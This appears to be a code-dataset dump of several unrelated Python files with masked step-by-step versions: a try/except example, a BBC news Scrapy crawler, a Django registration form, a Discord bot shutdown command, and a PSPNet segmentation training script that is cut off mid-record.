"step-2": "<mask token>\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-3": "s = '123'\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-4": "#-*- coding: utf-8 -*-\ns = \"123\"\n\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\n\nexcept ValueError as ve:\n print(\"ValueError occurs!!!\", ve)\n\nexcept ZeroDivisionError as e:\n print(\"ValueError occurs!!!\", e)\n\nexcept :\n print(\"Error occurs!!!\")\n\nelse:\n print(\"elseeeeeeeeeeeeeee\")\n\nfinally:\n print(\"ABCDEFG\")\n\n# try:\n# # 예외 발생 가능 코드들\n# except:\n# # 예외시 처리될 구문\n# except:\n# pass #씹겠다?!\n# else:\n# #예외가 없을 경우 실행되는 부분\n\n# finally:\n# #예외가 있던 없던 실행되는 부분",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
""" [BBC] Web Scraper """
import os
from .abstract_crawler import AbstractWebCrawler
class BBCCrawler(AbstractWebCrawler):
""" [BBC] Web Scraper """
# Spider Properties
name = "web_bbc"
# Crawler Properties
resource_link = 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security'
resource_label = 'bbc'
# TODO Move it to the super class
custom_settings = {
'ITEM_PIPELINES': {
'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500
}
}
links_to_articles_query = 'article > header > div > h3 > a::attr(href)'
links_to_pages_query = 'dummy' # dynamic ajax pagination
extract_title_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'
extract_datetime_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'
extract_content_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'
|
normal
|
{
"blob_id": "3c22fbfd7d83ff3ecacabc3c88af2169fa5906b9",
"index": 5190,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass BBCCrawler(AbstractWebCrawler):\n <mask token>\n name = 'web_bbc'\n resource_link = (\n 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security')\n resource_label = 'bbc'\n custom_settings = {'ITEM_PIPELINES': {\n 'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500}}\n links_to_articles_query = 'article > header > div > h3 > a::attr(href)'\n links_to_pages_query = 'dummy'\n extract_title_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'\n )\n extract_datetime_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'\n )\n extract_content_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'\n )\n",
"step-3": "<mask token>\n\n\nclass BBCCrawler(AbstractWebCrawler):\n \"\"\" [BBC] Web Scraper \"\"\"\n name = 'web_bbc'\n resource_link = (\n 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security')\n resource_label = 'bbc'\n custom_settings = {'ITEM_PIPELINES': {\n 'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500}}\n links_to_articles_query = 'article > header > div > h3 > a::attr(href)'\n links_to_pages_query = 'dummy'\n extract_title_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'\n )\n extract_datetime_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'\n )\n extract_content_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'\n )\n",
"step-4": "<mask token>\nimport os\nfrom .abstract_crawler import AbstractWebCrawler\n\n\nclass BBCCrawler(AbstractWebCrawler):\n \"\"\" [BBC] Web Scraper \"\"\"\n name = 'web_bbc'\n resource_link = (\n 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security')\n resource_label = 'bbc'\n custom_settings = {'ITEM_PIPELINES': {\n 'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500}}\n links_to_articles_query = 'article > header > div > h3 > a::attr(href)'\n links_to_pages_query = 'dummy'\n extract_title_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'\n )\n extract_datetime_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'\n )\n extract_content_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'\n )\n",
"step-5": "\"\"\" [BBC] Web Scraper \"\"\"\n\nimport os\nfrom .abstract_crawler import AbstractWebCrawler\n\n\nclass BBCCrawler(AbstractWebCrawler):\n \"\"\" [BBC] Web Scraper \"\"\"\n\n # Spider Properties\n name = \"web_bbc\"\n\n # Crawler Properties\n resource_link = 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security'\n resource_label = 'bbc'\n\n # TODO Move it to the super class\n custom_settings = {\n 'ITEM_PIPELINES': {\n 'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500\n }\n }\n\n links_to_articles_query = 'article > header > div > h3 > a::attr(href)'\n links_to_pages_query = 'dummy' # dynamic ajax pagination\n extract_title_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'\n extract_datetime_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'\n extract_content_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from django import forms
from django.core.validators import RegexValidator
from dashboard.validators import validate_domainonly_email
class addUserForm(forms.Form):
username = forms.CharField(label='User Name', required="required", disabled="", min_length=6, max_length=128,
help_text="",
widget=forms.TextInput(
attrs={
'style': '',
'placeholder': '',
}
))
first_name = forms.CharField(label='First Name', required="required", disabled="", min_length=3, max_length=128,
help_text="")
last_name = forms.CharField(label='Last Name', required="required", disabled="", min_length=3, max_length=128,
help_text="")
email = forms.EmailField(label='Email', required="required", disabled="", min_length=6, max_length=128,
help_text="", validators=[validate_domainonly_email])
password = forms.CharField(label='Password', required="required", disabled="", min_length=6, max_length=128,
help_text="", validators=[
RegexValidator('^(\w+\d+|\d+\w+)+$', message="Password should be a combination of Alphabets and Numbers")])
confirm_password = forms.CharField(label='Confirm Password', required="required", disabled="", min_length=6,
max_length=128,
help_text="")
def clean(self):
cleaned_data = super(addUserForm, self).clean()
username = cleaned_data.get('username')
first_name = cleaned_data.get('first_name')
last_name = cleaned_data.get('last_name')
email = cleaned_data.get('email')
password = cleaned_data.get('password')
confirm_password = cleaned_data.get('confirm_password')
if not username and not first_name and not last_name and not email and not password and not confirm_password:
raise forms.ValidationError('There are errors in the fields...!')
# class editUserForm(forms.Form):
# username = forms.CharField(label='User Name', required="required", disabled="disabled", min_length="6",
# max_length=128, help_text="")
# first_name = forms.CharField(label='First Name', max_length=254, help_text="")
# last_name = forms.CharField(label='Last Name', max_length=254, help_text="")
# email = forms.EmailField(label='Email', max_length=8, help_text="")
#
# def clean(self):
# cleaned_data = super(editUserForm, self).clean()
# username = cleaned_data.get('username')
# first_name = cleaned_data.get('first_name')
# last_name = cleaned_data.get('last_name')
# email = cleaned_data.get('email')
# if not username and not first_name and not last_name and not email:
# raise forms.ValidationError('There are errors in the fields...!')
|
normal
|
{
"blob_id": "39b6ca21b8d4856e2b2edfcbd00b75fbce6dfff7",
"index": 1407,
"step-1": "<mask token>\n\n\nclass addUserForm(forms.Form):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass addUserForm(forms.Form):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def clean(self):\n cleaned_data = super(addUserForm, self).clean()\n username = cleaned_data.get('username')\n first_name = cleaned_data.get('first_name')\n last_name = cleaned_data.get('last_name')\n email = cleaned_data.get('email')\n password = cleaned_data.get('password')\n confirm_password = cleaned_data.get('confirm_password')\n if (not username and not first_name and not last_name and not email and\n not password and not confirm_password):\n raise forms.ValidationError('There are errors in the fields...!')\n",
"step-3": "<mask token>\n\n\nclass addUserForm(forms.Form):\n username = forms.CharField(label='User Name', required='required',\n disabled='', min_length=6, max_length=128, help_text='', widget=\n forms.TextInput(attrs={'style': '', 'placeholder': ''}))\n first_name = forms.CharField(label='First Name', required='required',\n disabled='', min_length=3, max_length=128, help_text='')\n last_name = forms.CharField(label='Last Name', required='required',\n disabled='', min_length=3, max_length=128, help_text='')\n email = forms.EmailField(label='Email', required='required', disabled=\n '', min_length=6, max_length=128, help_text='', validators=[\n validate_domainonly_email])\n password = forms.CharField(label='Password', required='required',\n disabled='', min_length=6, max_length=128, help_text='', validators\n =[RegexValidator('^(\\\\w+\\\\d+|\\\\d+\\\\w+)+$', message=\n 'Password should be a combination of Alphabets and Numbers')])\n confirm_password = forms.CharField(label='Confirm Password', required=\n 'required', disabled='', min_length=6, max_length=128, help_text='')\n\n def clean(self):\n cleaned_data = super(addUserForm, self).clean()\n username = cleaned_data.get('username')\n first_name = cleaned_data.get('first_name')\n last_name = cleaned_data.get('last_name')\n email = cleaned_data.get('email')\n password = cleaned_data.get('password')\n confirm_password = cleaned_data.get('confirm_password')\n if (not username and not first_name and not last_name and not email and\n not password and not confirm_password):\n raise forms.ValidationError('There are errors in the fields...!')\n",
"step-4": "from django import forms\nfrom django.core.validators import RegexValidator\nfrom dashboard.validators import validate_domainonly_email\n\n\nclass addUserForm(forms.Form):\n username = forms.CharField(label='User Name', required='required',\n disabled='', min_length=6, max_length=128, help_text='', widget=\n forms.TextInput(attrs={'style': '', 'placeholder': ''}))\n first_name = forms.CharField(label='First Name', required='required',\n disabled='', min_length=3, max_length=128, help_text='')\n last_name = forms.CharField(label='Last Name', required='required',\n disabled='', min_length=3, max_length=128, help_text='')\n email = forms.EmailField(label='Email', required='required', disabled=\n '', min_length=6, max_length=128, help_text='', validators=[\n validate_domainonly_email])\n password = forms.CharField(label='Password', required='required',\n disabled='', min_length=6, max_length=128, help_text='', validators\n =[RegexValidator('^(\\\\w+\\\\d+|\\\\d+\\\\w+)+$', message=\n 'Password should be a combination of Alphabets and Numbers')])\n confirm_password = forms.CharField(label='Confirm Password', required=\n 'required', disabled='', min_length=6, max_length=128, help_text='')\n\n def clean(self):\n cleaned_data = super(addUserForm, self).clean()\n username = cleaned_data.get('username')\n first_name = cleaned_data.get('first_name')\n last_name = cleaned_data.get('last_name')\n email = cleaned_data.get('email')\n password = cleaned_data.get('password')\n confirm_password = cleaned_data.get('confirm_password')\n if (not username and not first_name and not last_name and not email and\n not password and not confirm_password):\n raise forms.ValidationError('There are errors in the fields...!')\n",
"step-5": "from django import forms\nfrom django.core.validators import RegexValidator\nfrom dashboard.validators import validate_domainonly_email\n\n\nclass addUserForm(forms.Form):\n username = forms.CharField(label='User Name', required=\"required\", disabled=\"\", min_length=6, max_length=128,\n help_text=\"\",\n widget=forms.TextInput(\n attrs={\n 'style': '',\n 'placeholder': '',\n }\n ))\n first_name = forms.CharField(label='First Name', required=\"required\", disabled=\"\", min_length=3, max_length=128,\n help_text=\"\")\n last_name = forms.CharField(label='Last Name', required=\"required\", disabled=\"\", min_length=3, max_length=128,\n help_text=\"\")\n email = forms.EmailField(label='Email', required=\"required\", disabled=\"\", min_length=6, max_length=128,\n help_text=\"\", validators=[validate_domainonly_email])\n\n password = forms.CharField(label='Password', required=\"required\", disabled=\"\", min_length=6, max_length=128,\n help_text=\"\", validators=[\n RegexValidator('^(\\w+\\d+|\\d+\\w+)+$', message=\"Password should be a combination of Alphabets and Numbers\")])\n confirm_password = forms.CharField(label='Confirm Password', required=\"required\", disabled=\"\", min_length=6,\n max_length=128,\n help_text=\"\")\n\n def clean(self):\n cleaned_data = super(addUserForm, self).clean()\n username = cleaned_data.get('username')\n first_name = cleaned_data.get('first_name')\n last_name = cleaned_data.get('last_name')\n email = cleaned_data.get('email')\n password = cleaned_data.get('password')\n confirm_password = cleaned_data.get('confirm_password')\n if not username and not first_name and not last_name and not email and not password and not confirm_password:\n raise forms.ValidationError('There are errors in the fields...!')\n\n# class editUserForm(forms.Form):\n# username = forms.CharField(label='User Name', required=\"required\", disabled=\"disabled\", min_length=\"6\",\n# max_length=128, help_text=\"\")\n# first_name = forms.CharField(label='First Name', max_length=254, help_text=\"\")\n# last_name = forms.CharField(label='Last Name', max_length=254, help_text=\"\")\n# email = forms.EmailField(label='Email', max_length=8, help_text=\"\")\n#\n# def clean(self):\n# cleaned_data = super(editUserForm, self).clean()\n# username = cleaned_data.get('username')\n# first_name = cleaned_data.get('first_name')\n# last_name = cleaned_data.get('last_name')\n# email = cleaned_data.get('email')\n# if not username and not first_name and not last_name and not email:\n# raise forms.ValidationError('There are errors in the fields...!')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from discord.ext import commands
def is_owner():
async def predicate(ctx):
return ctx.author.id == 98208218022428672
return commands.check(predicate)
class Staff(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(
name='stop',
aliases=['shutdown'],
description='This is a command for staff only to stop the bot'
)
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send('Oh, alright... I\'ll just shutup I guess.. :wave:')
await self.bot.close()
|
normal
|
{
"blob_id": "23b2cc5b561a11ae7757a281a141491d5b7e23ca",
"index": 2683,
"step-1": "<mask token>\n\n\nclass Staff(commands.Cog):\n <mask token>\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-2": "<mask token>\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-3": "<mask token>\n\n\ndef is_owner():\n\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-4": "from discord.ext import commands\n\n\ndef is_owner():\n\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-5": "from discord.ext import commands\n\n\ndef is_owner():\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(\n name='stop',\n aliases=['shutdown'],\n description='This is a command for staff only to stop the bot'\n )\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send('Oh, alright... I\\'ll just shutup I guess.. :wave:')\n await self.bot.close()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Author: BeiYu
# Github: https://github.com/beiyuouo
# Date : 2021/2/21 21:57
# Description:
__author__ = "BeiYu"
from utils.init_env import set_seed
from utils.options import *
import os
import logging
import torch
from torch import nn
from torch import optim
from torch.optim.lr_scheduler import MultiStepLR
from torch.autograd import Variable
from torch.utils.data import DataLoader
from modules.seg_dataset import *
from tqdm import tqdm
import click
import torch.nn.functional as F
import numpy as np
from modules.seg import PSPNet
models = {
'squeezenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='squeezenet', n_classes=3),
'densenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=512, backend='densenet', n_classes=3),
'resnet18': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet18', n_classes=3),
'resnet34': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet34', n_classes=3),
'resnet50': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet50', n_classes=3),
'resnet101': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet101', n_classes=3),
'resnet152': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet152', n_classes=3)
}
def build_network(snapshot, backend):
epoch = 0
backend = backend.lower()
net = models[backend]()
# net = nn.DataParallel(net)
if snapshot is not None:
_, epoch = os.path.basename(snapshot).split('_')
epoch = int(epoch)
net.load_state_dict(torch.load(snapshot))
logging.info("Snapshot for epoch {} loaded from {}".format(epoch, snapshot))
net = net.cuda(0)
return net, epoch
def train():
args = get_args()
# os.environ["CUDA_VISIBLE_DEVICES"] = gpu
# net, starting_epoch = build_network(snapshot, backend)
# data_path = os.path.abspath(os.path.expanduser(data_path))
# models_path = os.path.abspath(os.path.expanduser(models_path))
os.makedirs(args.model_path, exist_ok=True)
set_seed(args.seed)
'''
To follow this training routine you need a DataLoader that yields the tuples of the following format:
(Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where
x - batch of input images,
y - batch of groung truth seg maps,
y_cls - batch of 1D tensors of dimensionality N: N total number of classes,
y_cls[i, T] = 1 if class T is present in image i, 0 otherwise
'''
traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)
train_loader = DataLoader(traindata, batch_size=args.seg_batch_size, shuffle=True, num_workers=1)
net, _ = build_network(None, args.seg_backend)
seg_criterion = nn.NLLLoss().cuda(0)
cls_criterion = nn.BCEWithLogitsLoss().cuda(0)
optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)
# scheduler = MultiStepLR(optimizer, milestones=[int(x) for x in milestones.split(',')])
print("start training...")
net.train()
total_loss = 0.0
for epoch in range(args.seg_epochs):
if (epoch+1) % 5 == 0:
for group in optimizer.param_groups:
group['lr'] *= 0.25
total_loss = 0.0
for i, (x, y, y_cls) in enumerate(train_loader):
x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()
out, out_cls = net(x)
# print(x.shape, out.shape, out_cls.shape, y.shape, y_cls.shape)
seg_loss = seg_criterion(out, y)
cls_loss = cls_criterion(out_cls, y_cls)
loss = seg_loss + args.seg_alpha * cls_loss
total_loss += loss.item()
if i % 50 == 0:
status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i, len(traindata) // args.seg_batch_size,
epoch + 1,
loss.item())
print(status)
optimizer.zero_grad()
loss.backward()
optimizer.step()
torch.save(net.state_dict(), os.path.join(args.model_path,
f'{"seg"}_{args.seg_model}_{args.seg_backend}_{epoch}.pth'))
print(f'epoch:{epoch} total_loss: {total_loss / len(traindata)}')
if __name__ == '__main__':
train()
|
normal
|
{
"blob_id": "75e6554ea3c327c87a2a65710a7f1d55e9933bb0",
"index": 276,
"step-1": "<mask token>\n\n\ndef train():\n args = get_args()\n os.makedirs(args.model_path, exist_ok=True)\n set_seed(args.seed)\n \"\"\"\n To follow this training routine you need a DataLoader that yields the tuples of the following format:\n (Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where\n x - batch of input images,\n y - batch of groung truth seg maps,\n y_cls - batch of 1D tensors of dimensionality N: N total number of classes, \n y_cls[i, T] = 1 if class T is present in image i, 0 otherwise\n \"\"\"\n traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)\n train_loader = DataLoader(traindata, batch_size=args.seg_batch_size,\n shuffle=True, num_workers=1)\n net, _ = build_network(None, args.seg_backend)\n seg_criterion = nn.NLLLoss().cuda(0)\n cls_criterion = nn.BCEWithLogitsLoss().cuda(0)\n optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)\n print('start training...')\n net.train()\n total_loss = 0.0\n for epoch in range(args.seg_epochs):\n if (epoch + 1) % 5 == 0:\n for group in optimizer.param_groups:\n group['lr'] *= 0.25\n total_loss = 0.0\n for i, (x, y, y_cls) in enumerate(train_loader):\n x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()\n out, out_cls = net(x)\n seg_loss = seg_criterion(out, y)\n cls_loss = cls_criterion(out_cls, y_cls)\n loss = seg_loss + args.seg_alpha * cls_loss\n total_loss += loss.item()\n if i % 50 == 0:\n status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i,\n len(traindata) // args.seg_batch_size, epoch + 1, loss.\n item())\n print(status)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n torch.save(net.state_dict(), os.path.join(args.model_path,\n f\"{'seg'}_{args.seg_model}_{args.seg_backend}_{epoch}.pth\"))\n print(f'epoch:{epoch} total_loss: {total_loss / len(traindata)}')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef build_network(snapshot, backend):\n epoch = 0\n backend = backend.lower()\n net = models[backend]()\n if snapshot is not None:\n _, epoch = os.path.basename(snapshot).split('_')\n epoch = int(epoch)\n net.load_state_dict(torch.load(snapshot))\n logging.info('Snapshot for epoch {} loaded from {}'.format(epoch,\n snapshot))\n net = net.cuda(0)\n return net, epoch\n\n\ndef train():\n args = get_args()\n os.makedirs(args.model_path, exist_ok=True)\n set_seed(args.seed)\n \"\"\"\n To follow this training routine you need a DataLoader that yields the tuples of the following format:\n (Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where\n x - batch of input images,\n y - batch of groung truth seg maps,\n y_cls - batch of 1D tensors of dimensionality N: N total number of classes, \n y_cls[i, T] = 1 if class T is present in image i, 0 otherwise\n \"\"\"\n traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)\n train_loader = DataLoader(traindata, batch_size=args.seg_batch_size,\n shuffle=True, num_workers=1)\n net, _ = build_network(None, args.seg_backend)\n seg_criterion = nn.NLLLoss().cuda(0)\n cls_criterion = nn.BCEWithLogitsLoss().cuda(0)\n optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)\n print('start training...')\n net.train()\n total_loss = 0.0\n for epoch in range(args.seg_epochs):\n if (epoch + 1) % 5 == 0:\n for group in optimizer.param_groups:\n group['lr'] *= 0.25\n total_loss = 0.0\n for i, (x, y, y_cls) in enumerate(train_loader):\n x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()\n out, out_cls = net(x)\n seg_loss = seg_criterion(out, y)\n cls_loss = cls_criterion(out_cls, y_cls)\n loss = seg_loss + args.seg_alpha * cls_loss\n total_loss += loss.item()\n if i % 50 == 0:\n status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i,\n len(traindata) // args.seg_batch_size, epoch + 1, loss.\n item())\n print(status)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n torch.save(net.state_dict(), os.path.join(args.model_path,\n f\"{'seg'}_{args.seg_model}_{args.seg_backend}_{epoch}.pth\"))\n print(f'epoch:{epoch} total_loss: {total_loss / len(traindata)}')\n\n\nif __name__ == '__main__':\n train()\n",
"step-3": "__author__ = 'BeiYu'\n<mask token>\nmodels = {'squeezenet': lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=512,\n deep_features_size=256, backend='squeezenet', n_classes=3), 'densenet':\n lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=\n 512, backend='densenet', n_classes=3), 'resnet18': lambda : PSPNet(\n sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend=\n 'resnet18', n_classes=3), 'resnet34': lambda : PSPNet(sizes=(1, 2, 3, 6\n ), psp_size=512, deep_features_size=256, backend='resnet34', n_classes=\n 3), 'resnet50': lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=2048,\n deep_features_size=1024, backend='resnet50', n_classes=3), 'resnet101':\n lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=\n 1024, backend='resnet101', n_classes=3), 'resnet152': lambda : PSPNet(\n sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend=\n 'resnet152', n_classes=3)}\n\n\ndef build_network(snapshot, backend):\n epoch = 0\n backend = backend.lower()\n net = models[backend]()\n if snapshot is not None:\n _, epoch = os.path.basename(snapshot).split('_')\n epoch = int(epoch)\n net.load_state_dict(torch.load(snapshot))\n logging.info('Snapshot for epoch {} loaded from {}'.format(epoch,\n snapshot))\n net = net.cuda(0)\n return net, epoch\n\n\ndef train():\n args = get_args()\n os.makedirs(args.model_path, exist_ok=True)\n set_seed(args.seed)\n \"\"\"\n To follow this training routine you need a DataLoader that yields the tuples of the following format:\n (Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where\n x - batch of input images,\n y - batch of groung truth seg maps,\n y_cls - batch of 1D tensors of dimensionality N: N total number of classes, \n y_cls[i, T] = 1 if class T is present in image i, 0 otherwise\n \"\"\"\n traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)\n train_loader = DataLoader(traindata, batch_size=args.seg_batch_size,\n shuffle=True, num_workers=1)\n net, _ = build_network(None, args.seg_backend)\n seg_criterion = nn.NLLLoss().cuda(0)\n cls_criterion = nn.BCEWithLogitsLoss().cuda(0)\n optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)\n print('start training...')\n net.train()\n total_loss = 0.0\n for epoch in range(args.seg_epochs):\n if (epoch + 1) % 5 == 0:\n for group in optimizer.param_groups:\n group['lr'] *= 0.25\n total_loss = 0.0\n for i, (x, y, y_cls) in enumerate(train_loader):\n x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()\n out, out_cls = net(x)\n seg_loss = seg_criterion(out, y)\n cls_loss = cls_criterion(out_cls, y_cls)\n loss = seg_loss + args.seg_alpha * cls_loss\n total_loss += loss.item()\n if i % 50 == 0:\n status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i,\n len(traindata) // args.seg_batch_size, epoch + 1, loss.\n item())\n print(status)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n torch.save(net.state_dict(), os.path.join(args.model_path,\n f\"{'seg'}_{args.seg_model}_{args.seg_backend}_{epoch}.pth\"))\n print(f'epoch:{epoch} total_loss: {total_loss / len(traindata)}')\n\n\nif __name__ == '__main__':\n train()\n",
"step-4": "__author__ = 'BeiYu'\nfrom utils.init_env import set_seed\nfrom utils.options import *\nimport os\nimport logging\nimport torch\nfrom torch import nn\nfrom torch import optim\nfrom torch.optim.lr_scheduler import MultiStepLR\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom modules.seg_dataset import *\nfrom tqdm import tqdm\nimport click\nimport torch.nn.functional as F\nimport numpy as np\nfrom modules.seg import PSPNet\nmodels = {'squeezenet': lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=512,\n deep_features_size=256, backend='squeezenet', n_classes=3), 'densenet':\n lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=\n 512, backend='densenet', n_classes=3), 'resnet18': lambda : PSPNet(\n sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend=\n 'resnet18', n_classes=3), 'resnet34': lambda : PSPNet(sizes=(1, 2, 3, 6\n ), psp_size=512, deep_features_size=256, backend='resnet34', n_classes=\n 3), 'resnet50': lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=2048,\n deep_features_size=1024, backend='resnet50', n_classes=3), 'resnet101':\n lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=\n 1024, backend='resnet101', n_classes=3), 'resnet152': lambda : PSPNet(\n sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend=\n 'resnet152', n_classes=3)}\n\n\ndef build_network(snapshot, backend):\n epoch = 0\n backend = backend.lower()\n net = models[backend]()\n if snapshot is not None:\n _, epoch = os.path.basename(snapshot).split('_')\n epoch = int(epoch)\n net.load_state_dict(torch.load(snapshot))\n logging.info('Snapshot for epoch {} loaded from {}'.format(epoch,\n snapshot))\n net = net.cuda(0)\n return net, epoch\n\n\ndef train():\n args = get_args()\n os.makedirs(args.model_path, 